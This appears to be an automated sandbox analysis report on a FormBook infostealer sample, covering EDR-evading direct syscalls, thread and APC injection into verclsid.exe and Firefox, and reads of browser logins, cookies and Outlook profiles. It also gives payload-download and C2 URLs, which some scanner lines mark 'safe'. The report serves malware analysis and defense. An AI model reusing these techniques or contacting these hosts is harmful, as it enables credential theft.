Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov eax, dword ptr fs:[00000030h]	4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov eax, dword ptr fs:[00000030h]	4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov ecx, dword ptr fs:[00000030h]	4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]	4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]	4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]	4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5CC0 mov eax, dword ptr fs:[00000030h]	4_2_346A5CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5CC0 mov eax, dword ptr fs:[00000030h]	4_2_346A5CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]	4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]	4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]	4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681CC7 mov eax, dword ptr fs:[00000030h]	4_2_34681CC7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681CC7 mov eax, dword ptr fs:[00000030h]	4_2_34681CC7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]	4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]	4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]	4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]	4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]	4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]	4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]	4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]	4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466DCA0 mov eax, dword ptr fs:[00000030h]	4_2_3466DCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov ecx, dword ptr fs:[00000030h]	4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]	4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]	4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]	4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]	4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]	4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]	4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov ecx, dword ptr fs:[00000030h]	4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]	4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]	4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]	4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]	4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]	4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]	4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34729D70 mov eax, dword ptr fs:[00000030h]	4_2_34729D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34729D70 mov eax, dword ptr fs:[00000030h]	4_2_34729D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]	4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]	4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]	4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]	4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]	4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677D75 mov eax, dword ptr fs:[00000030h]	4_2_34677D75
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677D75 mov eax, dword ptr fs:[00000030h]	4_2_34677D75
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABD4E mov eax, dword ptr fs:[00000030h]	4_2_346ABD4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABD4E mov eax, dword ptr fs:[00000030h]	4_2_346ABD4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667D41 mov eax, dword ptr fs:[00000030h]	4_2_34667D41
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]	4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]	4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]	4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]	4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov ecx, dword ptr fs:[00000030h]	4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov ecx, dword ptr fs:[00000030h]	4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]	4_2_34683D40

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\verclsid.exe

Thread register set: target process: 1832

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\verclsid.exe

Thread APC queued: target process: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"	Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_00405DE5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405DE5

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\verclsid.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	312 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Access Token Manipulation	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	312 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	24 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Anfrage_244384.exe	11%	ReversingLabs	Win32.Trojan.InjectorX
Anfrage_244384.exe	100%	Avira	HEUR/AGEN.1361137

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://familytherapycenter.rs/	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.bins	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.bin2	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.bink	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.bin	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.binl	0%	Avira URL Cloud	safe
https://familytherapycenter.rs/LxuQG254.binA	0%	Avira URL Cloud	safe
https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=	0%	Avira URL Cloud	safe
http://www.svarus.online/sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
familytherapycenter.rs	188.40.95.144	true	false		high
www.svarus.online	194.58.112.174	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://familytherapycenter.rs/LxuQG254.bin	false	Avira URL Cloud: safe	unknown
http://www.svarus.online/sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA=	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	false		high
